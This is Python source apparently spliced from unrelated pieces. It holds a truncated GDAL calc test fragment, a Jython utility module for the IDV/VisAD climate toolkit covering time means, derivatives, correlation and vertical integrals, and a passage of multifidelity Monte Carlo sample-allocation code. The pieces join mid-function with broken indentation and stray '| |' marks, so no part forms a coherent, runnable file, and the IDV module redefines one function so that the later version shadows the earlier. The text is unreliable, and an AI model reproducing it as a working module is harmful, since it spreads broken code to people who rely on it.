    stacked = np.stack(a)
    return stacked.max(axis=0)
def test_gdal_calc_py_9():
"""
test calculating sum in different ways. testing the following features:
* | |
from visad.python.JPythonMethods import *
# A collection of Utilities for Mapes IDV Collection
#Author: <NAME>, <EMAIL>
############################TIME UTILS############################################
def getSamplesAtTimes(grid,year=None,season=None,mon=None,day=None,hour=None,min=None,sec=None,ms=None):
    """ Samples a grid at specified time periods, multiple arguments can be used in complex sampling
        eg.., using hour = 5 would return all samples corresponding to 5 am, further specifing year = 2008
        would give samples at 5am in year 2008
    """
    # NOTE(review): parameters `min`/`ms` shadow builtins; kept for interface compatibility.
    from visad import RealType
    from visad import Gridded1DDoubleSet
    from visad import FieldImpl
    from visad import FunctionType
    from visad import VisADException
    # a season is itself a set of months, so both filters together are ambiguous
    if (str(mon)!="None" and str(season)!="None"):
        raise VisADException("One of Month or Season can be used, not both")
    timeSet=GridUtil.getTimeSet(grid)
    # indices of the time steps whose formatted timestamps match the request
    indices=getSampleTimeIndices(grid,year,season,mon,day,hour,min,sec,ms)
    timevals=timeSet.getSamples()[0]
    subsetTimeValues=[timevals[i] for i in indices]
    # build a 1-D double time set holding only the matching times (same units as the original set)
    newTimes=Gridded1DDoubleSet(RealType.Time,[subsetTimeValues],len(subsetTimeValues),None,timeSet.getSetUnits(),None)
    # new field (Time -> sample type), filled with the matching samples in order
    subsetgrid = FieldImpl(FunctionType(RealType.Time, grid.getSample(0).getType()), newTimes)
    for i in range(len(subsetTimeValues)):
        subsetgrid.setSample(i,grid[indices[i]])
    return subsetgrid
def getSampleTimeIndices(grid,year=None,season=None,mon=None,day=None,hour=None,min=None,sec=None,ms=None):
    """ A Helper function to get indices of a grid at specified time periods; multiple
        arguments can be combined for complex sampling. Returns the list of matching
        time-step indices in the grid.

        Matching is textual: the requested components are concatenated into a date
        format (e.g. "yyyyMM") and compared against each formatted timestamp.
    """
    from visad import VisADException
    searchformat=""
    searchstring=""
    if (str(mon)!="None" and str(season)!="None"):
        raise VisADException("One of Month or Season can be used, not both")
    if (str(year)!="None" and len(str(year))==4):
        searchformat=searchformat+"yyyy"
        searchstring=searchstring+str(year)
    # BUG FIX: the original test was `int(mon) in ([range(1,13)])`, i.e. membership in a
    # list *containing* the list 1..12 -- never true, so month filtering never matched.
    if (str(mon)!="None" and int(mon) in range(1,13) and len(str(mon))<=2):
        searchformat=searchformat+"MM"
        # zero-pad to match the two-digit "MM" format
        searchstring=searchstring+str(mon).zfill(2)
    if (str(day)!="None"):
        searchformat=searchformat+"dd"
        # BUG FIX: day/hour/min/sec are zero-padded so e.g. day=5 matches the
        # two-digit "dd" rendering "05" (values already padded are unchanged)
        searchstring=searchstring+str(day).zfill(2)
    if (str(hour)!="None"):
        searchformat=searchformat+"HH"
        searchstring=searchstring+str(hour).zfill(2)
    if (str(min)!="None"):
        searchformat=searchformat+"mm"
        searchstring=searchstring+str(min).zfill(2)
    if (str(sec)!="None"):
        searchformat=searchformat+"ss"
        searchstring=searchstring+str(sec).zfill(2)
    if (str(ms)!="None"):
        # NOTE(review): "ms" is not a millisecond token in SimpleDateFormat-style
        # patterns (it reads as minute+second) -- confirm the intended format.
        searchformat=searchformat+"ms"
        searchstring=searchstring+str(ms)
    if (str(season)!="None"):
        seasons=("djf","jfm","mam","jja","son","ond","jjas")
        seasmons=((12,1,2),(1,2,3),(3,4,5),(6,7,8),(9,10,11),(10,11,12),(6,7,8,9))
        if (str(season).lower() in seasons):
            montimes=getSampleTimesInFormat(grid,"MM")
            alltimes=getSampleTimesInFormat(grid,searchformat.strip())
            seasonsearch=seasmons[list(seasons).index(str(season).lower())]
            # a step matches when the non-season components agree AND its month
            # belongs to the requested season
            matchindices=[i for i,t,m in zip(range(len(alltimes)),alltimes,montimes) if t==searchstring and int(m) in seasonsearch]
        else:
            raise VisADException("Season "+str(season)+" not found")
    else:
        alltimes=getSampleTimesInFormat(grid,searchformat.strip())
        matchindices=[i for i,t in enumerate(alltimes) if t==searchstring]
    return matchindices
def getSampleTimesInFormat(grid,timeformat,timezone="UTC",outformat="string"):
    """ A Helper function to return the times of a grid, rendered with *timeformat*,
        as a list.

        timezone  : any Java TimeZone id (default "UTC").
        outformat : "string"/"str", "float"/"flt" or "int"/"integer" -- controls the
                    element type of the returned list; anything else raises
                    VisADException.
    """
    from ucar.visad.data import CalendarDateTime
    from visad import DateTime
    from ucar.visad.UtcDate import formatUtcDate
    from visad import VisADException
    from java.util import TimeZone
    # BUG FIX: Integer was referenced below without ever being imported (Jython)
    from java.lang import Integer
    dateTimes = CalendarDateTime.timeSetToArray(GridUtil.getTimeSet(grid))
    TIMEZONE=TimeZone.getTimeZone(timezone)
    temp=[]
    for i in range(grid.getDomainSet().getLength()):
        # format once per step, then convert to the requested output type
        formatted = dateTimes[i].formattedString(timeformat,TIMEZONE)
        if (str(outformat).lower() in ("string","str")):
            temp.append(str(formatted))
        elif (str(outformat).lower() in ("float","flt")):
            temp.append(float(formatted))
        elif (str(outformat).lower() in ("int","integer")):
            temp.append(Integer(formatted))
        else:
            raise VisADException("Unrecognized output format")
    return temp
def createTimeMeans(grid,meanType="None"):
    """ Create time mean of a grid at periods specified by type.
        meanType can be yearly, monthly, daily, hourly, minutes, seconds

        The grid is partitioned into runs of *consecutive* samples whose formatted
        timestamp component (e.g. "MM" for monthly) is identical; each run becomes
        one output sample holding the arithmetic mean of the run, timestamped at
        the mean of the run's time values.
    """
    from visad import Real
    from visad import Gridded1DDoubleSet
    from visad import FieldImpl
    from visad import FunctionType
    from visad import RealType
    from visad import VisADException
    # map the requested averaging period onto a date-format token
    if (str(meanType).lower() in ("year","yr","years","yearly")):
        searchFormat="yyyy"
    elif (str(meanType).lower() in ("mon","month","months","monthly")):
        searchFormat="MM"
    elif (str(meanType).lower() in ("day","d","days","daily")):
        searchFormat="dd"
    elif (str(meanType).lower() in ("hr","hour","hours","hourly")):
        # NOTE(review): "hh" is a 12-hour-clock token; "HH" (0-23) may be intended -- confirm
        searchFormat="hh"
    elif (str(meanType).lower() in ("m","min","minute","minutes","minutely")):
        searchFormat="mm"
    elif (str(meanType).lower() in ("s","sec","second","seconds")):
        searchFormat="ss"
    else:
        raise VisADException("Unrecognized time mean type, use yearly or monthly etc")
    alltimes=getSampleTimesInFormat(grid,searchFormat)
    timeSet=GridUtil.getTimeSet(grid)
    timeset=GridUtil.getTimeSet(grid).getSamples()[0]
    timevalues=[i for i in timeset]
    # ---- pass 1: average the time values of each run of equal formatted stamps ----
    oldtime=alltimes[0]
    temptime=0
    count=0
    newtimelist=[]
    for currt,tv,i in zip(alltimes,timevalues,range(len(alltimes))):
        #values are always accumulated next time
        if currt==oldtime:
            #takes care of multiple times,first time,last time
            temptime=temptime+tv
            count=count+1
            if(i==(len(alltimes)-1)):
                # last sample closes the final run
                newtimeval=temptime/count
                newtimelist.append(newtimeval)
        else:
            #prev values are accumulated join to list
            newtimeval=temptime/count
            newtimelist.append(newtimeval)
            count=1
            temptime=tv
            oldtime=currt
            if(i==(len(alltimes)-1)):
                # last sample starts (and closes) a run of length 1
                newtimelist.append(temptime)
    #create new time set
    newTimes=Gridded1DDoubleSet(RealType.Time,[newtimelist],len(newtimelist),None,timeSet.getSetUnits(),None)
    newdatalist=FieldImpl(FunctionType(RealType.Time, grid.getSample(0).getType()), newTimes)
    timindices=range(len(newtimelist))
    # ---- pass 2: same run structure, but averaging the data samples ----
    oldtime=alltimes[0]
    tempdata=grid.getSample(0).multiply(Real(0.0))
    count=0
    newind=0
    for currt,i in zip(alltimes,range(len(alltimes))):
        #values are always accumulated next time
        if currt==oldtime:
            #takes care of multiple times,first time,last time
            tempdata=tempdata.add(grid.getSample(i))
            count=count+1
            if(i==(len(alltimes)-1)):
                newdatalist.setSample(newind,tempdata.divide(Real(count)))
                newind=newind+1
        else:
            #prev values are accumulated join to list
            newdatalist.setSample(newind,tempdata.divide(Real(count)))
            newind=newind+1
            count=1
            tempdata=grid.getSample(i)
            oldtime=currt
            if(i==(len(alltimes)-1)):
                # final single-sample run; count is 1 here
                newdatalist.setSample(newind,tempdata.divide(Real(count)))
    newParamName="Time Mean "+str(Util.cleanTypeName(GridUtil.getParamType(grid)))
    return newName(newdatalist,newParamName)
def ddt(grid,timegradunit):
    """ compute tendency (time derivative) using forward difference,
        units of returned grid are units of grid per timegradient unit
        timegradient unit can be month, day, hour, minute, seconds

        The result has one fewer time step than the input; each output sample
        is timestamped at the midpoint of the pair it was differenced from.
    """
    from visad import Real
    from visad import FunctionType
    from visad import FieldImpl
    from visad import RealType
    from visad import Gridded1DDoubleSet
    from ucar.visad.data import CalendarDateTime
    from visad import CommonUnit
    from visad import VisADException
    if (GridUtil.isTimeSequence(grid)==1):
        newTimeValues= []
        timediffs=[]
        ts = GridUtil.getTimeSet(grid)
        # seconds-per-unit conversion factor for the requested gradient unit
        # (a month is approximated as 30 days)
        if (str(timegradunit).lower() in ("mon","month","months")):
            timefactor=86400.0*30
            timegradunit="month"
        elif (str(timegradunit).lower() in ("day","d","days")):
            timefactor=86400.0
            timegradunit="day"
        elif (str(timegradunit).lower() in ("hr","hour","hours")):
            timefactor=3600.0
            timegradunit="hr"
        elif (str(timegradunit).lower() in ("m","min","minute","minutes")):
            timefactor=60.0
            timegradunit="min"
        elif (str(timegradunit).lower() in ("s","sec","second","seconds")):
            timefactor=1.0
            timegradunit="s"
        else:
            raise VisADException("Requested time gradient unit is ambigious,use month,day,hour etc")
        for i in range(grid.getDomainSet().getLength()-1):
            # midpoint timestamp of each consecutive pair
            newTimeValues.append((ts[i].getValue()+ts[i+1].getValue())/2)
            prevtime=float(ts[i].getValue(CommonUnit.secondsSinceTheEpoch))
            nexttime=float(ts[i+1].getValue(CommonUnit.secondsSinceTheEpoch))
            # time difference expressed in the requested unit
            timediffs.append((nexttime-prevtime)/timefactor)
        newTimes=Gridded1DDoubleSet(RealType.Time,[newTimeValues],len(newTimeValues),None,ts.getSetUnits(),None)
        ddtgrid = FieldImpl(FunctionType(RealType.Time, grid.getSample(0).getType()), newTimes)
        for i in range(grid.getDomainSet().getLength()-1):
            # forward difference divided by the elapsed time
            diff=(grid.getSample(i+1)-grid.getSample(i)).divide(Real(timediffs[i]))
            ddtgrid.setSample(i,diff)
        unitname=str(GridUtil.getParamType(grid).getComponent(0).getDefaultUnit())
        # diagnostic: report the derived unit string
        print("["+unitname+"]/"+str(timegradunit))
        newunit = Util.parseUnit("("+unitname+")/"+str(timegradunit))
        newType = Util.makeRealType("ddt of "+getVarName(grid), newunit)
    else:
        raise VisADException("Well, this data is not a time series, hard to do a time derivative!")
    return GridUtil.setParamType(ddtgrid,newType,0)
def anomalyFromTimeMeans(grid,meanType="None"):
    """ Returns deviation from time means; meanType can be monthly, daily etc.
        e.g. meanType="day" returns the deviation of each time step from its
        corresponding daily mean (resampled back onto the grid's time steps
        with nearest-neighbour matching).
    """
    from visad.Data import NEAREST_NEIGHBOR
    from visad.Data import NO_ERRORS
    from visad import VisADException
    timeMean=createTimeMeans(grid,meanType)
    # BUG FIX: removed a dead `grid.subtract(timeMean)` statement whose result was
    # discarded (subtract returns a new Data object; it does not mutate grid).
    # Validate meanType with the same accepted spellings as before. Note that
    # createTimeMeans (already called above) additionally accepts "yearly",
    # which this function still rejects -- preserved behavior.
    valid = ("mon","month","months","montly",
             "day","d","days","daily",
             "hr","hour","hours","hourly",
             "m","min","minute","minutes","minutely",
             "s","sec","second","seconds")
    if (str(meanType).lower() not in valid):
        raise VisADException("Unrecognized time mean type, use yearly or monthly etc")
    return grid.subtract(timeMean,NEAREST_NEIGHBOR,NO_ERRORS)
def getTimeDict(grid):
    """ A helper function to return timestamps of grid as a dictionary of formatted
        component lists.

        Keys: 'YYYYMMdd', 'HHmmss', 'YYYY', 'MM', 'dd', 'DD' (day of year),
        'hh' (hour of day), 'mm', 'ss'. Each maps to a list of strings, one per
        time step. Raises VisADException when the grid is not a time sequence.
    """
    from ucar.visad.data import CalendarDateTime
    from visad import DateTime
    from ucar.visad.UtcDate import formatUtcDate
    # BUG FIX: VisADException is raised below but was never imported
    from visad import VisADException
    if (GridUtil.isTimeSequence(grid)==1):
        dateTimes = CalendarDateTime.timeSetToArray(grid.getDomainSet())
        YYYY=[]
        MM=[]
        dd=[]
        DD=[]
        mm=[]
        hh=[]
        ss=[]
        YYYYMMdd=[]
        HHmmss=[]
        # BUG FIX: the loop iterated over the undefined name `ds` (NameError);
        # use `grid`. Also removed a leftover py2 debug print of the day-of-year.
        for i in range(grid.getDomainSet().getLength()):
            YYYY.append(str(dateTimes[i].formattedString("yyyy",DateTime.DEFAULT_TIMEZONE)))
            MM.append(str(dateTimes[i].formattedString("MM",DateTime.DEFAULT_TIMEZONE)))
            dd.append(str(dateTimes[i].formattedString("dd",DateTime.DEFAULT_TIMEZONE)))
            DD.append(str(dateTimes[i].formattedString("DD",DateTime.DEFAULT_TIMEZONE)))
            hh.append(str(dateTimes[i].formattedString("HH",DateTime.DEFAULT_TIMEZONE)))
            mm.append(str(dateTimes[i].formattedString("mm",DateTime.DEFAULT_TIMEZONE)))
            ss.append(str(dateTimes[i].formattedString("ss",DateTime.DEFAULT_TIMEZONE)))
            YYYYMMdd.append(str(dateTimes[i].formattedString("YYYYMMdd",DateTime.DEFAULT_TIMEZONE)))
            HHmmss.append(str(dateTimes[i].formattedString("HHmmss",DateTime.DEFAULT_TIMEZONE)))
        # BUG FIX: the 'hh' list was collected but omitted from the returned dict
        timeDict=dict([('YYYYMMdd',YYYYMMdd),('HHmmss',HHmmss),('YYYY', YYYY),('MM',MM),('dd',dd),('DD',DD),('hh',hh),('mm',mm),('ss',ss)])
    else:
        raise VisADException("This grid is not a time sequence")
    return timeDict
def setValuestoGridAverage(variable,avgvariable):
    """ Return a copy of *variable* in which every grid point of each time step
        is set to the spatial average of *avgvariable* at that step.
        The average is a plain mean (currently not area weighted).
    """
    from ucar.unidata.util.Misc import getAverage
    time_set = GridUtil.getTimeSet(variable)
    result = variable.clone()
    for step in range(time_set.getLength()):
        step_avg = getAverage(avgvariable.getSample(step).getFloats()[0])
        result.setSample(step, replace(variable.getSample(step), step_avg))
    return result
def correlationwith1d(variable,variable1d):
    """ Time correlation at each grid point of *variable* with the 1-D time
        series *variable1d* (broadcast over the spatial domain first).
    """
    broadcast = setValuestoGridAverage(variable, variable1d)
    return correlation(variable, broadcast)
def correlation(xvar,yvar):
    """ Computes the time correlation at each grid point of xvar with the
        corresponding grid point of yvar.

        Both grids must be time sequences with the same number of time steps;
        otherwise a VisADException is raised.
    """
    # BUG FIX: VisADException is raised below but was not imported in this
    # function (sibling functions in this module all import it locally)
    from visad import VisADException
    if(GridUtil.isTimeSequence(xvar) and GridUtil.isTimeSequence(yvar) and GridUtil.getTimeSet(xvar).getLength() == GridUtil.getTimeSet(yvar).getLength()):
        xavg=averageOverTime(xvar,makeTimes=0)
        yavg=averageOverTime(yvar,makeTimes=0)
        xdev=xvar-xavg
        ydev=yvar-yavg
        # sample covariance (sum of products of deviations over n-1)
        xydevsumbyn=sumOverTime(xdev.multiply(ydev))/(GridUtil.getTimeSet(xdev).getLength()-1)
        # NOTE(review): despite the names these hold sample *variances*, not
        # standard deviations; the sqrt is applied in the return expression.
        xstddev=sumOverTime(xdev**2,makeTimes=0)/(GridUtil.getTimeSet(xdev).getLength()-1)
        ystddev=sumOverTime(ydev**2,makeTimes=0)/(GridUtil.getTimeSet(ydev).getLength()-1)
    else:
        raise VisADException("Number of timesteps for correlation should be same")
    return noUnit(xydevsumbyn)/noUnit((xstddev**0.5)*(ystddev**0.5))
#######################################AREA UTILS###################################################
def areaWeights(grid):
    """ Return a field of normalized cell-area weights for *grid*.

        Each point holds its cell area divided by the total area, so the
        weights sum to 1 over the spatial domain.
    """
    from visad import Real
    area_field = createAreaField(grid)
    total_area = sum(area_field.getValues()[0])
    return area_field.divide(Real(total_area))
def xyAreaAverage(grid):
    """ Area-weighted spatial average of *grid*, returned as a grid holding the
        averaged value at every point (original parameter type preserved).
    """
    original_type = GridUtil.getParamType(grid)
    weighted_sum = xsum(ysum(grid*areaWeights(grid)))
    return GridUtil.setParamType(weighted_sum, original_type, 0)
def deviationXY(grid):
    """ Deviation of each grid point from the grid's area-average value. """
    area_avg = xyAreaAverage(grid)
    return sub(grid, area_avg)
def anomalyFromTimeMeans(grid):
    """ Computes deviation from time mean at each grid point.
    """
    # NOTE(review): this redefines anomalyFromTimeMeans(grid, meanType) declared
    # earlier in this module; being defined later, this one-argument version
    # shadows it, so the meanType variant is unreachable. Confirm intended.
    avggrid=averageOverTime(grid,1)
    return grid.subtract(avggrid)
def deviationXYT(grid):
    """ Deviation from both the time mean and the spatial area mean at each point. """
    time_anomaly = anomalyFromTimeMeans(grid)
    return deviationXY(time_anomaly)
def computeGridAreaAverage(variable):
    """ Area-weighted spatial reduction of the first time sample of *variable*.

        NOTE(review): the final line takes the *mean* of the area-weighted values
        (sum/len) rather than their sum; with normalized weights an area average
        is usually the plain sum -- confirm this is intended.
    """
    from ucar.unidata.util.Misc import getAverage
    from visad import Real
    # NOTE(review): getAverage is imported but unused here
    #print GridUtil.isTimeSequence(variable)
    areaW=createAreaField(variable)
    sumareaW=sum(areaW.getValues()[0])
    # normalize the area field so its values sum to 1
    areaW=areaW.divide(Real(sumareaW))
    test=variable.getSample(0).multiply(areaW)
    aavg=sum(test.getValues()[0])/len(test.getValues()[0])
    return aavg
def rebin(grid,newGrid):
    """ Rebin or regrid *grid* onto the spatial domain of *newGrid* using
        VisAD's weighted-average resampling (Data.WEIGHTED_AVERAGE).
    """
    from visad import Data
    return GridUtil.resampleGrid(grid,GridUtil.getSpatialDomain(newGrid),Data.WEIGHTED_AVERAGE)
################################VERTICAL UTILS###########################################
def getLevels(grid):
    """ Return the distinct vertical level values of a 3D grid as a list.

        Raises VisADException when the grid has no vertical dimension.
    """
    from visad import VisADException
    domain = GridUtil.getSpatialDomain(grid)
    if not GridUtil.is3D(domain):
        raise VisADException("No Vertical Levels Found")
    leveldim = domain.getManifoldDimension()
    return remove_duplicates(domain.getSamples()[leveldim-1])
def getAbsCDiff(levels):
    """ Return the absolute centered differences of a list of level values.

        Interior entries get |levels[i+1]-levels[i-1]|/2; the two endpoints use
        the one-sided difference to their single neighbour. The result has the
        same length as *levels* and serves as per-level layer thickness for the
        vertical averaging/integration helpers.

        Note: a single-element list raises IndexError (no neighbour to
        difference against).
    """
    # (fix: removed an unused `from visad import VisADException` import)
    # copy so the caller's list is never mutated
    cdiff = levels[:]
    for i, lev in zip(range(len(levels)), levels):
        if i == 0:
            # leading edge: one-sided forward difference
            cdiff[i] = abs(levels[i+1]-levels[i])/1.0
        else:
            if i == len(levels)-1:
                # trailing edge: one-sided backward difference
                cdiff[i] = abs(levels[i-1]-levels[i])/1.0
            else:
                # interior: centered difference across both neighbours
                cdiff[i] = abs(levels[i+1]-levels[i-1])/2.0
    return cdiff
def verticalWeightedAvg(grid):
    """ Vertical average of a 3D grid, weighting each level by its spacing
        (centered level differences normalized to sum to 1).
    """
    from visad import Real
    levels = getLevels(grid)
    spacings = getAbsCDiff(levels)
    total = sum(spacings)
    # start from a zero-valued 2D slice taken at the last level
    result = GridUtil.make2DGridFromSlice(GridUtil.sliceAtLevel(grid, levels[-1])).multiply(Real(0.0))
    for lev, dlev in zip(levels, spacings):
        layer = GridUtil.make2DGridFromSlice(GridUtil.sliceAtLevel(grid, float(lev)), 0)
        result = result + layer.multiply(Real(dlev/total))
    return result
def verticalIntegral(grid):
    """ Vertical integral of a 3D grid: sum of each level's slice multiplied
        by its (centered-difference) layer thickness.
    """
    from visad import Real
    levels = getLevels(grid)
    spacings = getAbsCDiff(levels)
    # start from a zero-valued 2D slice taken at the last level
    result = GridUtil.make2DGridFromSlice(GridUtil.sliceAtLevel(grid, levels[-1])).multiply(Real(0.0))
    for lev, dlev in zip(levels, spacings):
        layer = GridUtil.make2DGridFromSlice(GridUtil.sliceAtLevel(grid, float(lev)), 0)
        result = result + layer.multiply(Real(dlev))
    return result
def pverticalIntegral(grid):
    """ Pressure-coordinate vertical integral of a 3D grid divided by gravity:
        integral( grid dp/g ), with g hard-coded as 9.8 m/s^2.
    """
    from visad import Real
    levels = getLevels(grid)
    spacings = getAbsCDiff(levels)
    # start from a zero-valued 2D slice taken at the last level
    result = GridUtil.make2DGridFromSlice(GridUtil.sliceAtLevel(grid, levels[-1])).multiply(Real(0.0))
    for lev, dlev in zip(levels, spacings):
        layer = GridUtil.make2DGridFromSlice(GridUtil.sliceAtLevel(grid, float(lev)), 0)
        result = result + layer.multiply(Real(dlev/9.8))
    return result
def ddz(grid):
    """ Partial derivative of a 3D grid along its vertical coordinate.

        Caveat kept from the original: when only one level is present this may
        end up differentiating along another dimension instead of failing.
    """
    from visad import VisADException
    domain = GridUtil.getSpatialDomain(grid)
    if not GridUtil.is3D(domain):
        raise VisADException("Not a 3D Spatial Grid")
    leveldim = domain.getManifoldDimension()
    return GridMath.partial(grid, (leveldim-1))
def smooth3d(grid,smooth_fn,smooth_val=None):
""" Returns a smoothend | |
nsample_ratios = standardize_sample_ratios(
nhf_samples, nsample_ratios)
gamma = get_variance_reduction(get_rsquared_mfmc, cov, nsample_ratios)
log10_variance = np.log10(gamma)+np.log10(cov[0, 0])-np.log10(
nhf_samples)
return nhf_samples, np.atleast_1d(nsample_ratios), log10_variance
def allocate_samples_mlmc(cov, costs, target_cost, standardize=True):
    r"""
    Determine the samples to be allocated to each model when using MLMC
    Parameters
    ----------
    cov : np.ndarray (nmodels,nmodels)
        The covariance C between each of the models. The highest fidelity
        model is the first model, i.e its variance is cov[0,0]
    costs : np.ndarray (nmodels)
        The relative costs of evaluating each model
    target_cost : float
        The total cost budget
    standardize : boolean
        If true make sure that nhf_samples is an integer and that
        nhf_samples*nsamples_ratios are integers. False is only ever used
        for testing.
    Returns
    -------
    nhf_samples : integer
        The number of samples of the high fidelity model
    nsample_ratios : np.ndarray (nmodels-1)
        The sample ratios r used to specify the number of samples of the
        lower fidelity models, e.g. N_i = r_i*nhf_samples,
        i=1,...,nmodels-1. For model i>0 nsample_ratio*nhf_samples equals
        the number of samples in the two different discrepancies involving
        the ith model.
    log10_variance : float
        The base 10 logarithm of the variance of the estimator
    """
    nmodels = cov.shape[0]
    sum1 = 0.0
    nsamples = []
    vardeltas = []
    for ii in range(nmodels-1):
        # compute the variance of the discrepancy
        vardelta = cov[ii, ii] + cov[ii+1, ii+1] - 2*cov[ii, ii+1]
        vardeltas.append(vardelta)
        # compute the variance * cost
        vc = vardelta * (costs[ii] + costs[ii+1])
        # compute the unnormalized number of samples\
        # these values will be normalized by lamda later
        nsamp = np.sqrt(vardelta / (costs[ii] + costs[ii+1]))
        nsamples.append(nsamp)
        sum1 += np.sqrt(vc)
    # NOTE(review): `I` is unused debug residue tied to the commented assert below
    I = np.argsort(vardeltas)
    #assert np.allclose(I,np.arange(nmodels-1))
    # compute information for lowest fidelity model
    v = cov[nmodels-1, nmodels-1]
    c = costs[nmodels-1]
    nsamples.append(np.sqrt(v/c))
    sum1 += np.sqrt(v*c)
    # compute the ML estimator variance from the target cost
    variance = sum1**2 / target_cost
    # compute the lagrangian parameter
    sqrt_lamda = sum1/variance
    # compute the number of samples allocated to resolving each
    # discrepancy.
    nl = [sqrt_lamda * n for n in nsamples]
    # compute the number of samples allocated to each model. For
    # all but the highest fidelity model we need to collect samples
    # from two discrepancies.
    nhf_samples = nl[0]
    nsample_ratios = []
    for ii in range(1, nmodels-1):
        # each interior model appears in the discrepancies ii-1 and ii
        nsample_ratios.append((nl[ii-1] + nl[ii])/nl[0])
    if nmodels > 1:
        nsample_ratios.append((nl[-2]+nl[-1])/nl[0])
    nsample_ratios = np.asarray(nsample_ratios)
    if standardize:
        # round to a usable integer allocation (at least one HF sample)
        nhf_samples = max(nhf_samples, 1)
        nhf_samples, nsample_ratios = standardize_sample_ratios(
            nhf_samples, nsample_ratios)
    gamma = get_variance_reduction(get_rsquared_mlmc, cov, nsample_ratios)
    log10_variance = np.log10(gamma)+np.log10(cov[0, 0])-np.log10(
        nhf_samples)
    # print(log10_variance)
    if np.isnan(log10_variance):
        raise Exception('MLMC variance is NAN')
    return nhf_samples, np.atleast_1d(nsample_ratios), log10_variance
def get_lagrange_multiplier_mlmc(cov, costs, nhf_samples):
    r"""
    Recover the optimal value of the Lagrange multiplier from an optimal
    MLMC sample allocation. Only used for testing.
    """
    # variance and cost of the 0th discrepancy (between models 0 and 1)
    var_delta0 = cov[0, 0] + cov[1, 1] - 2*cov[0, 1]
    cost_delta0 = costs[0] + costs[1]
    return nhf_samples**2/(var_delta0/cost_delta0)
def get_discrepancy_covariances_IS(cov, nsample_ratios, pkg=np):
    r"""
    Covariances of the discrepancies :math:`\delta` between each low-fidelity
    model and its estimated mean, for the independent-samples (IS) strategy:
    the same :math:`N` samples estimate the model covariances while
    :math:`N-r_\alpha` independently drawn samples estimate each
    low-fidelity mean.

    Parameters
    ----------
    cov : np.ndarray (nmodels,nmodels)
        The estimated covariance between each model.
    nsample_ratios : iterable (nmodels-1)
        The sample ratios :math:`r_\alpha>1` for each low-fidelity model
    pkg : package (optional)
        A python package (numpy or torch) used to store the covariances.

    Returns
    -------
    CF : np.ndarray (nmodels-1,nmodels-1)
        Covariances between the discrepancies :math:`\delta`
    cf : np.ndarray (nmodels-1)
        Covariances between the discrepancies and the high-fidelity model.
    """
    nmodels = cov.shape[0]
    nlf = nmodels - 1
    # per-model fraction (r-1)/r of samples shared with the mean estimate
    fracs = [(nsample_ratios[kk]-1)/nsample_ratios[kk] for kk in range(nlf)]
    F = pkg.zeros((nlf, nlf), dtype=pkg.double)
    for ii in range(nlf):
        F[ii, ii] = fracs[ii]
        for jj in range(ii+1, nlf):
            # off-diagonal entries factor into the two fractions (independence)
            F[ii, jj] = fracs[ii]*fracs[jj]
            F[jj, ii] = F[ii, jj]
    CF = cov[1:, 1:] * F
    cf = pkg.diag(F) * cov[1:, 0]
    return CF, cf
def get_discrepancy_covariances_MF(cov, nsample_ratios, pkg=np):
    r"""
    Covariances of the discrepancies :math:`\delta` between each low-fidelity
    model and its estimated mean under the MFMC (nested) sampling strategy.

    Parameters
    ----------
    cov : np.ndarray (nmodels,nmodels)
        The estimated covariance between each model.
    nsample_ratios : iterable (nmodels-1)
        The sample ratios :math:`r_\alpha>1` for each low-fidelity model
    pkg : package (optional)
        A python package (numpy or torch) used to store the covariances.

    Returns
    -------
    CF : np.ndarray (nmodels-1,nmodels-1)
        Covariances between the discrepancies :math:`\delta`
    cf : np.ndarray (nmodels-1)
        Covariances between the discrepancies and the high-fidelity model.
    """
    nmodels = cov.shape[0]
    nlf = nmodels - 1
    F = pkg.zeros((nlf, nlf), dtype=pkg.double)
    for ii in range(nlf):
        for jj in range(nlf):
            # with nested sample sets the overlap is governed by the smaller ratio
            shared = min(nsample_ratios[ii], nsample_ratios[jj])
            F[ii, jj] = (shared - 1) / shared
    CF = cov[1:, 1:] * F
    cf = pkg.diag(F) * cov[1:, 0]
    return CF, cf
def get_discrepancy_covariances_KL(cov, nsample_ratios, K, L, pkg=np):
    r"""
    Get the covariances of the discrepancies :math:`\delta`
    between each low-fidelity model and its estimated mean using the MFMC
    sampling strategy and the ACV KL estimator.
    The ACV-KL estimator partitions all of the control variates into two
    groups; the first K variables form a K -level approximate control
    variate, and the last :math:`M-K` variables are used to reduce the variance
    of estimating :math:`\mu_L` some :math:`L \le K` . The resulting estimator
    accelerates convergence to OCV-K , and L provides a degree of freedom
    for targeting a control variate level that contributes the greatest to
    the estimator variance.
    Parameters
    ----------
    cov : np.ndarray (nmodels,nmodels)
        The estimated covariance between each model.
    nsample_ratios : iterable (nmodels-1)
        The sample ratios :math:`r_\alpha>1` for each low-fidelity model
    K : integer (K<=nmodels-1)
        The number of effective control variates.
    L : integer (1<=L<=K+1)
        The id of the models whose mean is being targeted by the
        remaining nmodels-K low fidelity models.
    pkg : package (optional)
        A python package (numpy or torch) used to store the covariances.
    Results
    -------
    CF : np.ndarray (nmodels-1,nmodels-1)
        The matrix of covariances between the discrepancies :math:`\delta`
    cf : np.ndarray (nmodels-1)
        The vector of covariances between the discrepancies and the
        high-fidelity model.
    """
    nmodels = cov.shape[0]
    assert L <= K+1 and L >= 1 and K < nmodels
    # shift to 0-based indices for the loops below
    K, L = K-1, L-1
    F = pkg.zeros((nmodels-1, nmodels-1), dtype=pkg.double)
    rs = nsample_ratios
    # the small 1e-20 terms below guard against division by zero
    for ii in range(nmodels-1):
        if ii <= K:
            # model inside the K-level ACV group
            F[ii, ii] = (rs[ii]-1)/(rs[ii]+1e-20)
        else:
            # model targeting mu_L
            F[ii, ii] = (rs[ii]-rs[L])/(rs[ii]*rs[L])
        for jj in range(ii+1, nmodels-1):
            if (ii <= K) and (jj <= K):
                # both models in the ACV group: overlap set by the smaller ratio
                ri = min(rs[ii], rs[jj])
                F[ii, jj] = (ri - 1) / (ri + 1e-20)
            elif (jj > K) and (ii > K):
                # both models target mu_L
                ri = min(rs[ii], rs[jj])
                t1 = (rs[ii]-rs[L])*(rs[jj]-rs[L])/(rs[ii]*rs[jj]*rs[L]
                                                    + 1e-20)
                t2 = (ri - rs[L]) / (rs[ii] * rs[jj] + 1e-20)
                F[ii, jj] = t1 + t2
            elif (ii > L) and (ii <= K) and (jj > K):
                # ii in the ACV group above L, jj targets mu_L
                F[ii, jj] = (rs[ii] - rs[L]) / (rs[ii] * rs[L] + 1e-20)
            elif (jj > L) and (jj <= K) and (ii > K):
                # symmetric case of the previous branch
                F[ii, jj] = (rs[jj] - rs[L]) / (rs[jj] * rs[L] + 1e-20)
            else:
                F[ii, jj] = 0.0
            F[jj, ii] = F[ii, jj]
    CF = cov[1:, 1:] * F
